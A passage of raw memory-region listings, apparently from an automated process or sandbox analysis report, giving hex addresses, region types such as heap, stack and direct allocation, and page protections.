heap
page read and write
1120000
trusted library allocation
page read and write
31E1000
heap
page read and write
44CC000
direct allocation
page read and write
A84000
heap
page read and write
775000
heap
page read and write
807000
heap
page read and write
4501000
direct allocation
page read and write
6BA000
unkown
page write copy
E23000
heap
page read and write
764000
heap
page read and write
5660000
trusted library section
page readonly
40D0000
direct allocation
page execute and read and write
27405600000
heap
page read and write
2DD0000
heap
page read and write
1CE89290000
remote allocation
page read and write
2ACE000
heap
page read and write
892F57E000
unkown
page readonly
335E000
direct allocation
page read and write
17DB000
heap
page read and write
3F80000
direct allocation
page execute and read and write
DF0000
heap
page read and write
751000
heap
page read and write
2CE0000
heap
page read and write
2950000
remote allocation
page read and write
7FDCE000
direct allocation
page read and write
31DA000
heap
page read and write
183A000
heap
page read and write
291E000
stack
page read and write
7BFE000
heap
page read and write
3110000
heap
page read and write
31C4000
heap
page read and write
74E000
stack
page read and write
8130000
trusted library allocation
page read and write
A84000
heap
page read and write
12C000
stack
page read and write
3B60000
direct allocation
page execute and read and write
17B4000
heap
page read and write
4290000
direct allocation
page execute and read and write
5680000
heap
page execute and read and write
269C000
direct allocation
page read and write
235B000
direct allocation
page read and write
E29000
heap
page read and write
274056ED000
heap
page read and write
6B81000
direct allocation
page read and write
678A000
heap
page read and write
8790000
trusted library allocation
page read and write
3520000
direct allocation
page execute and read and write
31C4000
heap
page read and write
E0F000
heap
page read and write
3200000
direct allocation
page read and write
2ACE000
heap
page read and write
9FF000
stack
page read and write
44A0000
direct allocation
page read and write
2AB3000
heap
page read and write
17CE000
heap
page read and write
762000
heap
page read and write
5EE000
unkown
page read and write
5F2000
unkown
page readonly
681E000
stack
page read and write
764000
heap
page read and write
4F75000
heap
page read and write
576000
heap
page read and write
61E9F000
unkown
page readonly
7820000
trusted library allocation
page read and write
29AE000
heap
page read and write
2FDC000
stack
page read and write
67CA000
heap
page read and write
3390000
heap
page read and write
17F0000
heap
page read and write
13F0000
heap
page read and write
360000
unkown
page readonly
1CE89193000
heap
page read and write
27400097000
heap
page read and write
3000000
trusted library allocation
page read and write
274056CD000
heap
page read and write
44E1000
direct allocation
page read and write
B38000
unkown
page readonly
8160000
trusted library allocation
page read and write
2B20000
remote allocation
page read and write
97000
stack
page read and write
7E0000
heap
page read and write
3365000
direct allocation
page read and write
4260000
direct allocation
page execute and read and write
77BD000
heap
page read and write
360000
unkown
page readonly
56C1000
heap
page read and write
14A8000
heap
page read and write
522F000
stack
page read and write
50A000
unkown
page read and write
1F03FF60000
heap
page read and write
53FF000
stack
page read and write
6BB000
unkown
page readonly
770C000
direct allocation
page read and write
6B7000
unkown
page write copy
1740000
direct allocation
page read and write
2CE9000
heap
page read and write
8130000
trusted library allocation
page read and write
8130000
trusted library allocation
page read and write
940000
heap
page read and write
3310000
direct allocation
page read and write
2B0C000
heap
page read and write
A7EE000
stack
page read and write
8130000
trusted library allocation
page read and write
26B8000
direct allocation
page read and write
3901000
heap
page read and write
4F00000
trusted library allocation
page read and write
7F4000
heap
page read and write
36FF000
stack
page read and write
38FD000
heap
page read and write
8130000
trusted library allocation
page read and write
456C000
direct allocation
page read and write
31AC000
heap
page read and write
2DA6000
heap
page read and write
A84000
heap
page read and write
4E2F000
stack
page read and write
7FDDE000
direct allocation
page read and write
2B10000
heap
page read and write
38A0000
direct allocation
page execute and read and write
35E0000
direct allocation
page execute and read and write
338E000
stack
page read and write
16D0000
heap
page read and write
1755000
heap
page read and write
31C4000
heap
page read and write
7B54000
heap
page read and write
1B8D000
heap
page read and write
11D8000
heap
page read and write
A84000
heap
page read and write
3F50000
direct allocation
page execute and read and write
7F4000
heap
page read and write
4DB1000
heap
page read and write
8130000
trusted library allocation
page read and write
3200000
direct allocation
page read and write
19C000
stack
page read and write
8130000
trusted library allocation
page read and write
4EB0000
trusted library allocation
page read and write
8130000
trusted library allocation
page read and write
1136000
trusted library allocation
page execute and read and write
2324000
direct allocation
page read and write
4F00000
trusted library allocation
page read and write
2C6F000
stack
page read and write
2B38000
heap
page read and write
3303000
direct allocation
page read and write
1CE89290000
remote allocation
page read and write
27400A01000
trusted library allocation
page read and write
4130000
direct allocation
page execute and read and write
31C4000
heap
page read and write
2AAC000
heap
page read and write
31C4000
heap
page read and write
3371000
direct allocation
page read and write
1CE89170000
heap
page read and write
2CF0000
heap
page read and write
4450000
direct allocation
page execute and read and write
538000
unkown
page readonly
34BD000
heap
page read and write
17AB000
heap
page read and write
2ADA000
heap
page read and write
314E000
stack
page read and write
27405661000
heap
page read and write
1CE891AC000
heap
page read and write
31C4000
heap
page read and write
1E0000
heap
page read and write
50D000
unkown
page write copy
7FD81000
direct allocation
page read and write
807D000
stack
page read and write
7FDE0000
direct allocation
page read and write
274013E0000
trusted library allocation
page read and write
31C4000
heap
page read and write
7B82000
heap
page read and write
231D000
direct allocation
page read and write
3D70000
direct allocation
page execute and read and write
7F4000
heap
page read and write
31F0000
heap
page read and write
5FB9000
heap
page read and write
33C4000
direct allocation
page execute and read and write
A84000
heap
page read and write
A84000
heap
page read and write
17E5000
heap
page read and write
7FE3C000
direct allocation
page read and write
760000
heap
page read and write
349B000
direct allocation
page read and write
2D9B000
trusted library allocation
page read and write
925000
unkown
page execute and read and write
34A9000
direct allocation
page read and write
346C000
direct allocation
page read and write
10F5000
heap
page read and write
5FBF000
heap
page read and write
57DD000
stack
page read and write
5F9F000
heap
page read and write
238D48F0000
heap
page read and write
8130000
trusted library allocation
page read and write
44A0000
direct allocation
page read and write
33C0000
heap
page read and write
8130000
trusted library allocation
page read and write
BFD000
stack
page read and write
7F4000
heap
page read and write
2B03000
heap
page read and write
E31000
heap
page read and write
A84000
heap
page read and write
31EB000
heap
page read and write
5E676FE000
stack
page read and write
A6B000
unkown
page execute and read and write
6770000
heap
page read and write
4230000
direct allocation
page execute and read and write
EF7000
stack
page read and write
663E000
direct allocation
page read and write
31B3000
heap
page read and write
76C000
stack
page read and write
981000
heap
page read and write
33C7000
direct allocation
page execute and read and write
E32000
heap
page read and write
2DA6000
heap
page read and write
E36000
heap
page read and write
172E000
stack
page read and write
32A8000
heap
page read and write
7F4000
heap
page read and write
33B6000
direct allocation
page execute and read and write
43B0000
direct allocation
page execute and read and write
31C4000
heap
page read and write
400000
unkown
page readonly
2B35000
heap
page read and write
2AE6000
heap
page read and write
3371000
direct allocation
page execute and read and write
3280000
heap
page read and write
3280000
direct allocation
page read and write
31C4000
heap
page read and write
A54C000
stack
page read and write
A84000
heap
page read and write
29B4000
heap
page read and write
61E9E000
unkown
page write copy
3F20000
direct allocation
page execute and read and write
2AE9000
heap
page read and write
7F4000
heap
page read and write
38FA000
heap
page read and write
DF1000
heap
page read and write
8130000
trusted library allocation
page read and write
305A000
heap
page read and write
1132000
trusted library allocation
page read and write
4FC000
stack
page read and write
892E77E000
unkown
page readonly
2FD7000
trusted library allocation
page read and write
27405490000
trusted library allocation
page read and write
35B0000
direct allocation
page execute and read and write
2AB3000
heap
page read and write
29C5000
heap
page read and write
401000
unkown
page execute read
2AEF000
heap
page read and write
A64D000
stack
page read and write
2399000
direct allocation
page read and write
7BA000
heap
page read and write
1460000
heap
page read and write
7F4000
heap
page read and write
769000
heap
page read and write
4591000
direct allocation
page read and write
3FD000
stack
page read and write
2C7E000
stack
page read and write
E10000
heap
page read and write
2D76000
heap
page read and write
33DF000
stack
page read and write
7F4000
heap
page read and write
14AE000
stack
page read and write
718000
heap
page read and write
A84000
heap
page read and write
7F4000
heap
page read and write
8130000
trusted library allocation
page read and write
6785000
heap
page read and write
2B04000
heap
page read and write
A84000
heap
page read and write
2FB8000
heap
page read and write
E26000
heap
page read and write
4160000
direct allocation
page execute and read and write
A84000
heap
page read and write
36E3000
direct allocation
page read and write
1450000
heap
page read and write
1760000
heap
page read and write
34BF000
heap
page read and write
8130000
trusted library allocation
page read and write
274054A0000
trusted library allocation
page read and write
A84000
heap
page read and write
2740007B000
heap
page read and write
31B3000
heap
page read and write
397E000
stack
page read and write
929000
unkown
page execute and read and write
8EB0000
trusted library allocation
page execute and read and write
7EC000
heap
page read and write
3970000
direct allocation
page execute and read and write
2B7D000
heap
page read and write
452B000
direct allocation
page read and write
6B1000
unkown
page read and write
29AE000
heap
page read and write
96A000
heap
page read and write
6B1000
unkown
page read and write
A84000
heap
page read and write
DB0000
heap
page read and write
4F79000
heap
page read and write
27401030000
trusted library section
page readonly
31C4000
heap
page read and write
4030000
direct allocation
page execute and read and write
27400090000
heap
page read and write
7F4000
heap
page read and write
31D4000
heap
page read and write
735000
heap
page read and write
61E01000
unkown
page execute read
1811000
heap
page read and write
31C4000
heap
page read and write
1CE89290000
remote allocation
page read and write
E54000
heap
page read and write
31C4000
heap
page read and write
8200000
trusted library allocation
page read and write
34B8000
direct allocation
page read and write
17CE000
heap
page read and write
8130000
trusted library allocation
page read and write
8E8000
stack
page read and write
2740091A000
heap
page read and write
2D9E000
stack
page read and write
5AF000
unkown
page write copy
7F4000
heap
page read and write
2678000
direct allocation
page read and write
29C8000
heap
page read and write
A84000
heap
page read and write
38F6000
heap
page read and write
3540000
direct allocation
page execute and read and write
E1A000
heap
page read and write
A84000
heap
page read and write
4DB1000
heap
page read and write
4CAD000
direct allocation
page read and write
34C5000
heap
page read and write
323D000
heap
page read and write
4EEE000
stack
page read and write
29C1000
heap
page read and write
3378000
direct allocation
page read and write
6BA000
unkown
page write copy
29D0000
heap
page read and write
B20000
unkown
page readonly
758000
heap
page read and write
31C4000
heap
page read and write
1E6000
heap
page read and write
A84000
heap
page read and write
7F4000
heap
page read and write
8130000
trusted library allocation
page read and write
1114000
trusted library allocation
page read and write
5335000
trusted library allocation
page read and write
7F4000
heap
page read and write
502F000
stack
page read and write
7FD10000
direct allocation
page read and write
31C4000
heap
page read and write
31C4000
heap
page read and write
6AE1000
direct allocation
page read and write
A84000
heap
page read and write
E2B000
heap
page read and write
746000
heap
page read and write
787E000
stack
page read and write
753000
heap
page read and write
892F7FE000
stack
page read and write
17E1000
heap
page read and write
2E3D000
stack
page read and write
3B10000
direct allocation
page execute and read and write
27405550000
trusted library allocation
page read and write
E54000
heap
page read and write
C58000
heap
page read and write
31C4000
heap
page read and write
176B000
heap
page read and write
1B8B000
heap
page read and write
238D4920000
heap
page read and write
E3A000
heap
page read and write
94C000
heap
page read and write
9B0D000
stack
page read and write
304E000
stack
page read and write
108F000
stack
page read and write
31C4000
heap
page read and write
7F4000
heap
page read and write
4F2F000
stack
page read and write
11B0000
heap
page read and write
1A6E000
stack
page read and write
4510000
heap
page read and write
36B0000
direct allocation
page execute and read and write
539F000
stack
page read and write
274053F0000
trusted library allocation
page read and write
A00000
heap
page read and write
6BA000
unkown
page write copy
2F7E000
trusted library allocation
page read and write
2D79000
heap
page read and write
7F4000
heap
page read and write
10FB000
heap
page read and write
36F1000
direct allocation
page read and write
2F8E000
trusted library allocation
page read and write
B22000
unkown
page readonly
31CE000
heap
page read and write
322E000
heap
page read and write
3432000
direct allocation
page read and write
17E1000
heap
page read and write
2CFB000
heap
page read and write
2B9F000
stack
page read and write
7F4000
heap
page read and write
A84000
heap
page read and write
A84000
heap
page read and write
16C000
stack
page read and write
526E000
stack
page read and write
2B00000
heap
page read and write
7F4000
heap
page read and write
3C90000
direct allocation
page execute and read and write
3A90000
direct allocation
page execute and read and write
3AD0000
direct allocation
page execute and read and write
36D4000
direct allocation
page read and write
2D40000
heap
page read and write
2ACE000
stack
page read and write
6D5D000
stack
page read and write
65E000
stack
page read and write
2740563F000
heap
page read and write
2FC0000
heap
page read and write
510000
heap
page read and write
455D000
direct allocation
page read and write
E38000
heap
page read and write
61E9B000
unkown
page read and write
E54000
heap
page read and write
7FE10000
direct allocation
page read and write
1F03FF67000
heap
page read and write
346C000
direct allocation
page read and write
3210000
heap
page read and write
C50000
heap
page read and write
2B25000
heap
page read and write
31C4000
heap
page read and write
2DE0000
heap
page read and write
34AA000
heap
page read and write
4F83000
heap
page read and write
651D000
direct allocation
page read and write
361000
unkown
page execute read
22A9000
heap
page read and write
3CD0000
direct allocation
page execute and read and write
4EAC54E000
stack
page read and write
6B7000
unkown
page write copy
1E7000
heap
page read and write
35D0000
direct allocation
page execute and read and write
8790000
trusted library allocation
page read and write
190000
heap
page read and write
31EB000
heap
page read and write
3730000
direct allocation
page execute and read and write
31C4000
heap
page read and write
34C5000
heap
page read and write
E54000
heap
page read and write
38E0000
direct allocation
page execute and read and write
2CCE000
stack
page read and write
57F0000
heap
page read and write
31AF000
heap
page read and write
31C4000
heap
page read and write
42B0000
direct allocation
page execute and read and write
892E677000
stack
page read and write
E36000
heap
page read and write
31A8000
heap
page read and write
5F90000
heap
page read and write
7F5000
heap
page read and write
3050000
heap
page read and write
29C1000
heap
page read and write
44B2000
direct allocation
page read and write
76F10FC000
stack
page read and write
8130000
trusted library allocation
page read and write
31C4000
heap
page read and write
17E5000
heap
page read and write
3B80000
direct allocation
page execute and read and write
35F0000
heap
page read and write
A84000
heap
page read and write
4FE7000
heap
page read and write
23B0000
direct allocation
page read and write
760000
heap
page read and write
A84000
heap
page read and write
8130000
trusted library allocation
page read and write
1CE891BC000
heap
page read and write
4F79000
heap
page read and write
8130000
trusted library allocation
page read and write
2B4B000
heap
page read and write
3DE0000
direct allocation
page execute and read and write
6C8000
heap
page read and write
463C000
direct allocation
page read and write
2FE0000
heap
page read and write
7F4000
heap
page read and write
722000
heap
page read and write
52BE000
stack
page read and write
7820000
trusted library allocation
page read and write
12D0000
heap
page read and write
A84000
heap
page read and write
31E1000
heap
page read and write
29CB000
heap
page read and write
5330000
trusted library allocation
page read and write
5A1000
unkown
page read and write
2DD0000
trusted library allocation
page read and write
31C4000
heap
page read and write
3950000
direct allocation
page execute and read and write
2A9F000
stack
page read and write
A7D000
stack
page read and write
892F8FE000
stack
page read and write
8200000
trusted library allocation
page read and write
97F000
stack
page read and write
777C000
stack
page read and write
3EE0000
direct allocation
page execute and read and write
7772000
heap
page read and write
AD0000
heap
page read and write
29C1000
heap
page read and write
7820000
trusted library allocation
page read and write
E13000
heap
page read and write
773000
heap
page read and write
955E000
stack
page read and write
2AE1000
heap
page read and write
273FFE90000
heap
page read and write
4340000
direct allocation
page execute and read and write
43A0000
direct allocation
page execute and read and write
2E80000
heap
page read and write
E19000
heap
page read and write
29C1000
heap
page read and write
8200000
trusted library allocation
page read and write
2590000
heap
page read and write
42C0000
direct allocation
page execute and read and write
144E000
stack
page read and write
3A20000
direct allocation
page execute and read and write
4A8E000
stack
page read and write
3900000
direct allocation
page execute and read and write
2D65000
heap
page read and write
29C5000
heap
page read and write
22A9000
direct allocation
page read and write
3890000
direct allocation
page execute and read and write
4EB0000
trusted library allocation
page read and write
31C4000
heap
page read and write
2B00000
heap
page read and write
892F4FE000
stack
page read and write
31C4000
heap
page read and write
4100000
direct allocation
page execute and read and write
8130000
trusted library allocation
page read and write
233A000
direct allocation
page read and write
3242000
heap
page read and write
3BE0000
direct allocation
page execute and read and write
2B39000
heap
page read and write
7C2E000
heap
page read and write
5F2000
unkown
page readonly
507E000
stack
page read and write
2DCA000
heap
page read and write
1CE89070000
heap
page read and write
7B48000
heap
page read and write
3905000
heap
page read and write
70F000
heap
page read and write
2F90000
heap
page read and write
46F000
heap
page read and write
3494000
direct allocation
page read and write
360000
unkown
page readonly
17E1000
heap
page read and write
E18000
heap
page read and write
6A5F000
stack
page read and write
8160000
trusted library allocation
page read and write
520000
heap
page read and write
3907000
heap
page read and write
A84000
heap
page read and write
A84000
heap
page read and write
29CB000
heap
page read and write
55D000
stack
page read and write
7820000
trusted library allocation
page read and write
8790000
trusted library allocation
page read and write
7720000
trusted library allocation
page read and write
981000
heap
page read and write
7FE00000
direct allocation
page read and write
29AE000
heap
page read and write
A84000
heap
page read and write
7F4000
heap
page read and write
6A0000
heap
page read and write
6AC6000
direct allocation
page read and write
34B9000
heap
page read and write
31C4000
heap
page read and write
A84000
heap
page read and write
76C000
stack
page read and write
8130000
trusted library allocation
page read and write
1E7000
heap
page read and write
31C4000
heap
page read and write
1110000
trusted library allocation
page read and write
2694000
direct allocation
page read and write
3530000
direct allocation
page execute and read and write
4F02000
heap
page read and write
8130000
trusted library allocation
page read and write
7F4000
heap
page read and write
4CA0000
direct allocation
page read and write
323C000
heap
page read and write
4F00000
heap
page read and write
4EAC5CF000
stack
page read and write
4F75000
heap
page read and write
A86000
unkown
page execute and write copy
298C000
heap
page read and write
65BD000
direct allocation
page read and write
54BE000
stack
page read and write
401000
unkown
page execute read
4EC4000
trusted library allocation
page read and write
17E1000
heap
page read and write
8130000
trusted library allocation
page read and write
8ED000
stack
page read and write
2AF0000
heap
page read and write
338E000
stack
page read and write
43C0000
direct allocation
page execute and read and write
E3A000
heap
page read and write
8130000
trusted library allocation
page read and write
37A6000
heap
page read and write
42D0000
direct allocation
page execute and read and write
417000
unkown
page read and write
E17000
heap
page read and write
43E0000
direct allocation
page execute and read and write
2D66000
heap
page read and write
26CE000
direct allocation
page read and write
3343000
direct allocation
page read and write
4EC2000
trusted library allocation
page read and write
2980000
heap
page read and write
9CE000
stack
page read and write
5F2000
unkown
page readonly
795E000
stack
page read and write
6776000
heap
page read and write
27400800000
heap
page read and write
274056E6000
heap
page read and write
31C4000
heap
page read and write
4574000
direct allocation
page read and write
7FD70000
direct allocation
page read and write
8130000
trusted library allocation
page read and write
3C80000
direct allocation
page execute and read and write
975000
heap
page read and write
41C000
unkown
page readonly
2EEC000
stack
page read and write
1CE891AC000
heap
page read and write
4470000
direct allocation
page execute and read and write
31C4000
heap
page read and write
8130000
trusted library allocation
page read and write
8AB000
stack
page read and write
E20000
heap
page read and write
3451000
direct allocation
page read and write
2DB6000
trusted library allocation
page read and write
2F96000
trusted library allocation
page read and write
2ACE000
heap
page read and write
2C3F000
stack
page read and write
3790000
direct allocation
page execute and read and write
3315000
direct allocation
page read and write
A84000
heap
page read and write
D7E000
stack
page read and write
8F5E000
stack
page read and write
76A000
heap
page read and write
18D8000
heap
page read and write
8790000
trusted library allocation
page read and write
8130000
trusted library allocation
page read and write
7FD0E000
direct allocation
page read and write
31C4000
heap
page read and write
7F7C000
stack
page read and write
1FB3000
direct allocation
page read and write
346C000
direct allocation
page read and write
2375000
direct allocation
page read and write
4F7F000
heap
page read and write
892FC7B000
stack
page read and write
E31000
heap
page read and write
9C90000
trusted library allocation
page read and write
777000
heap
page read and write
3230000
heap
page read and write
2AB3000
heap
page read and write
37A0000
direct allocation
page execute and read and write
756000
heap
page read and write
8130000
trusted library allocation
page read and write
31C4000
heap
page read and write
7F4000
heap
page read and write
2AE5000
heap
page read and write
AE6000
heap
page read and write
1F0000
heap
page read and write
3CA0000
direct allocation
page execute and read and write
2FCE000
stack
page read and write
E12000
heap
page read and write
8F1D000
stack
page read and write
3E30000
direct allocation
page execute and read and write
26D5000
direct allocation
page read and write
A84000
heap
page read and write
6BB000
unkown
page readonly
298C000
heap
page read and write
3307000
direct allocation
page read and write
29C1000
heap
page read and write
47C000
heap
page read and write
27401010000
trusted library section
page readonly
818000
heap
page read and write
6BB000
unkown
page readonly
4F02000
heap
page read and write
17EB000
heap
page read and write
995F000
stack
page read and write
6BB000
unkown
page readonly
11D0000
heap
page read and write
5F2000
unkown
page readonly
4F7E000
heap
page read and write
E22000
heap
page read and write
40B0000
direct allocation
page execute and read and write
8130000
trusted library allocation
page read and write
11DE000
heap
page read and write
2AF9000
heap
page read and write
3AF0000
direct allocation
page execute and read and write
29C1000
heap
page read and write
E1E000
heap
page read and write
F60000
heap
page read and write
31C4000
heap
page read and write
2CF1000
heap
page read and write
3B30000
direct allocation
page execute and read and write
20C4000
direct allocation
page read and write
5683000
heap
page execute and read and write
31F2000
heap
page read and write
A84000
heap
page read and write
150000
stack
page read and write
7C0000
heap
page read and write
979E000
stack
page read and write
76FE000
stack
page read and write
4380000
direct allocation
page execute and read and write
8130000
trusted library allocation
page read and write
A84000
heap
page read and write
7FD88000
direct allocation
page read and write
7820000
trusted library allocation
page read and write
31CE000
heap
page read and write
113A000
trusted library allocation
page execute and read and write
569F000
stack
page read and write
20DA000
direct allocation
page read and write
7820000
trusted library allocation
page read and write
1CE891BB000
heap
page read and write
17CE000
heap
page read and write
31C4000
heap
page read and write
31C4000
heap
page read and write
20E8000
direct allocation
page read and write
2D7D000
heap
page read and write
4430000
direct allocation
page execute and read and write
5340000
trusted library allocation
page read and write
8130000
trusted library allocation
page read and write
6AE8000
direct allocation
page read and write
52B0000
heap
page read and write
29C0000
heap
page read and write
17B3000
heap
page read and write
7F4000
heap
page read and write
4050000
direct allocation
page execute and read and write
6B6000
unkown
page read and write
34C0000
heap
page read and write
361000
unkown
page execute read
29BA000
heap
page read and write
229B000
direct allocation
page read and write
17EB000
heap
page read and write
6B6000
unkown
page write copy
74E000
stack
page read and write
6771000
heap
page read and write
7FD2E000
direct allocation
page read and write
892F87E000
unkown
page readonly
2B10000
heap
page read and write
3468000
direct allocation
page read and write
E12000
heap
page read and write
2FCE000
trusted library allocation
page read and write
2ADA000
heap
page read and write
E10000
heap
page read and write
23B0000
direct allocation
page read and write
31E0000
heap
page read and write
1130000
trusted library allocation
page read and write
7A3E000
stack
page read and write
31E1000
heap
page read and write
7B0000
heap
page read and write
2593000
heap
page read and write
AFB000
stack
page read and write
68E000
stack
page read and write
265F000
direct allocation
page read and write
29C5000
heap
page read and write
8AD000
stack
page read and write
8130000
trusted library allocation
page read and write
7F4000
heap
page read and write
BC0000
heap
page read and write
373E000
stack
page read and write
31C4000
heap
page read and write
31D0000
trusted library allocation
page read and write
11D0000
heap
page read and write
A84000
heap
page read and write
31C4000
heap
page read and write
3C20000
direct allocation
page execute and read and write
3820000
direct allocation
page execute and read and write
6C5C000
stack
page read and write
31C4000
heap
page read and write
29EE000
stack
page read and write
17B3000
heap
page read and write
7820000
trusted library allocation
page read and write
401000
unkown
page execute and write copy
2C90000
heap
page read and write
451B000
direct allocation
page read and write
3C10000
direct allocation
page execute and read and write
3DF0000
direct allocation
page execute and read and write
7B5C000
heap
page read and write
70F000
stack
page read and write
4F00000
trusted library allocation
page read and write
8130000
trusted library allocation
page read and write
360000
unkown
page readonly
2CDE000
stack
page read and write
1147000
trusted library allocation
page execute and read and write
36CD000
direct allocation
page read and write
228B000
direct allocation
page read and write
11D5000
heap
page read and write
324E000
heap
page read and write
3C70000
direct allocation
page execute and read and write
A650000
trusted library allocation
page read and write
1F03FEB0000
heap
page read and write
3390000
direct allocation
page execute and read and write
A84000
heap
page read and write
29C5000
heap
page read and write
274000A7000
heap
page read and write
6870000
heap
page read and write
5410000
heap
page read and write
2CED000
stack
page read and write
3720000
direct allocation
page execute and read and write
1B85000
heap
page read and write
9ACE000
stack
page read and write
274056F9000
heap
page read and write
941E000
stack
page read and write
273FFEB0000
heap
page read and write
7720000
trusted library allocation
page read and write
4623000
direct allocation
page read and write
310E000
stack
page read and write
1CE89270000
heap
page read and write
22F9000
direct allocation
page read and write
31C4000
heap
page read and write
3580000
direct allocation
page execute and read and write
225F000
direct allocation
page read and write
29D2000
heap
page read and write
6B6000
unkown
page write copy
3E90000
direct allocation
page execute and read and write
2CE0000
heap
page read and write
3F40000
direct allocation
page execute and read and write
31A9000
heap
page read and write
4F1F000
heap
page read and write
2DA6000
heap
page read and write
346F000
direct allocation
page read and write
17EB000
heap
page read and write
29BA000
heap
page read and write
892F3FE000
stack
page read and write
2DDE000
stack
page read and write
5AD000
unkown
page read and write
3E40000
direct allocation
page execute and read and write
31C4000
heap
page read and write
34AC000
direct allocation
page read and write
2FB0000
heap
page read and write
969E000
stack
page read and write
3A00000
direct allocation
page execute and read and write
8130000
trusted library allocation
page read and write
37D0000
direct allocation
page execute and read and write
748000
heap
page read and write
3700000
direct allocation
page execute and read and write
2686000
direct allocation
page read and write
9D0000
heap
page read and write
2CDF000
stack
page read and write
4F75000
heap
page read and write
502000
unkown
page read and write
2B30000
heap
page read and write
17E5000
heap
page read and write
3EA0000
direct allocation
page execute and read and write
12C0000
heap
page read and write
27401050000
trusted library section
page readonly
322E000
heap
page read and write
4F04000
heap
page read and write
8130000
trusted library allocation
page read and write
7D1F000
stack
page read and write
6F9000
heap
page read and write
710000
heap
page read and write
E1F000
heap
page read and write
3DC0000
direct allocation
page execute and read and write
7F4000
heap
page read and write
3441000
direct allocation
page read and write
31C0000
heap
page read and write
E3A000
heap
page read and write
93DE000
stack
page read and write
27400013000
heap
page read and write
2986000
heap
page read and write
560000
heap
page read and write
3360000
direct allocation
page execute and read and write
2B26000
heap
page read and write
BC8000
stack
page read and write
274054B4000
trusted library allocation
page read and write
72F000
stack
page read and write
13EE000
stack
page read and write
3D80000
direct allocation
page execute and read and write
3180000
heap
page read and write
892EA7C000
stack
page read and write
11AE000
stack
page read and write
4FEB000
heap
page read and write
318E000
stack
page read and write
29F0000
heap
page read and write
74D000
heap
page read and write
21A0000
heap
page read and write
3B70000
direct allocation
page execute and read and write
4F75000
heap
page read and write
29CC000
heap
page read and write
8130000
trusted library allocation
page read and write
63D000
stack
page read and write
2AE1000
heap
page read and write
27405702000
heap
page read and write
3E00000
direct allocation
page execute and read and write
6C0000
heap
page read and write
8130000
trusted library allocation
page read and write
2CEF000
stack
page read and write
892F47E000
unkown
page readonly
6500000
direct allocation
page read and write
5F80000
heap
page read and write
7FE40000
direct allocation
page read and write
55C0000
heap
page read and write
8130000
trusted library allocation
page read and write
31E5000
heap
page read and write
61E88000
unkown
page write copy
300F000
stack
page read and write
7B40000
heap
page read and write
2ADA000
heap
page read and write
4D50000
heap
page read and write
450F000
stack
page read and write
31EA000
heap
page read and write
6B1000
unkown
page read and write
2930000
heap
page read and write
4040000
direct allocation
page execute and read and write
7720000
trusted library allocation
page read and write
3384000
direct allocation
page execute and read and write
2740561F000
heap
page read and write
3CC0000
direct allocation
page execute and read and write
22CD000
direct allocation
page read and write
2AEB000
heap
page read and write
22E4000
direct allocation
page read and write
1E7000
heap
page read and write
633E000
stack
page read and write
6B5D000
direct allocation
page read and write
31EC000
heap
page read and write
31C4000
heap
page read and write
A84000
heap
page read and write
E14000
heap
page read and write
1CE89178000
heap
page read and write
2DC0000
heap
page read and write
2267000
direct allocation
page read and write
14C6000
heap
page read and write
27400075000
heap
page read and write
27401020000
trusted library section
page readonly
361000
unkown
page execute read
4EB0000
trusted library allocation
page read and write
5EE000
unkown
page read and write
31E1000
heap
page read and write
4080000
direct allocation
page execute and read and write
892F0FE000
stack
page read and write
34A0000
heap
page read and write
2D4B000
heap
page read and write
17BB000
heap
page read and write
40C0000
direct allocation
page execute and read and write
8200000
trusted library allocation
page read and write
8130000
trusted library allocation
page read and write
2AA0000
heap
page read and write
7F3000
heap
page read and write
31C0000
heap
page read and write
31A0000
heap
page read and write
7FDF0000
direct allocation
page read and write
50D000
unkown
page read and write
981000
heap
page read and write
31DA000
heap
page read and write
A84000
heap
page read and write
3400000
direct allocation
page read and write
7F4000
heap
page read and write
56C0000
heap
page read and write
5F2000
unkown
page readonly
26AA000
direct allocation
page read and write
1740000
direct allocation
page read and write
324A000
heap
page read and write
1140000
trusted library allocation
page read and write
7E7000
heap
page read and write
2AE1000
heap
page read and write
B6B000
stack
page read and write
26E3000
direct allocation
page read and write
4350000
direct allocation
page execute and read and write
29BA000
heap
page read and write
4D0F000
stack
page read and write
2AD4000
heap
page read and write
4E6E000
stack
page read and write
31C4000
heap
page read and write
2F2C000
stack
page read and write
6B6000
unkown
page write copy
3A60000
direct allocation
page execute and read and write
3323000
direct allocation
page read and write
2AAC000
heap
page read and write
3760000
direct allocation
page execute and read and write
6774000
heap
page read and write
17AC000
heap
page read and write
22B0000
direct allocation
page read and write
892E87E000
stack
page read and write
4F10000
heap
page read and write
17EA000
heap
page read and write
2BED000
stack
page read and write
31C4000
heap
page read and write
41F0000
direct allocation
page execute and read and write
322E000
stack
page read and write
888000
unkown
page execute and write copy
A84000
heap
page read and write
6B7000
unkown
page write copy
76BC000
stack
page read and write
2B7E000
stack
page read and write
2160000
direct allocation
page execute and read and write
1740000
direct allocation
page read and write
175A000
heap
page read and write
63D000
stack
page read and write
3186000
heap
page read and write
3232000
heap
page read and write
27405450000
trusted library allocation
page read and write
8200000
trusted library allocation
page read and write
3DB0000
direct allocation
page execute and read and write
5EE000
unkown
page read and write
4DB1000
heap
page read and write
3660000
direct allocation
page execute and read and write
18D9000
heap
page read and write
180000
stack
page read and write
3F10000
direct allocation
page execute and read and write
2CB0000
trusted library allocation
page execute and read and write
24E0000
direct allocation
page read and write
34A6000
heap
page read and write
7FCA0000
direct allocation
page read and write
738000
heap
page read and write
3302000
direct allocation
page read and write
40A0000
direct allocation
page execute and read and write
E32000
heap
page read and write
892F97E000
unkown
page readonly
31E1000
heap
page read and write
8130000
trusted library allocation
page read and write
349D000
direct allocation
page read and write
315F000
stack
page read and write
2AFE000
stack
page read and write
34AA000
direct allocation
page read and write
34A9000
heap
page read and write
29AE000
heap
page read and write
7F4000
heap
page read and write
17BB000
heap
page read and write
1FB8000
direct allocation
page read and write
3710000
direct allocation
page execute and read and write
7BF000
heap
page read and write
31DA000
heap
page read and write
3BF0000
direct allocation
page execute and read and write
4B0000
heap
page read and write
72D000
heap
page read and write
5670000
heap
page read and write
185000
stack
page read and write
72A000
heap
page read and write
DF8000
heap
page read and write
11DB000
heap
page read and write
31C4000
heap
page read and write
4DB1000
heap
page read and write
7FD5E000
direct allocation
page read and write
5800000
heap
page read and write
23D3000
direct allocation
page read and write
22729BA3000
heap
page read and write
274054A0000
trusted library allocation
page read and write
61E8A000
unkown
page readonly
580000
heap
page read and write
2F9C000
stack
page read and write
4556000
direct allocation
page read and write
2AA9000
heap
page read and write
52A0000
heap
page read and write
BE0000
heap
page read and write
A84000
heap
page read and write
2F9B000
trusted library allocation
page read and write
6BA000
unkown
page write copy
2ACE000
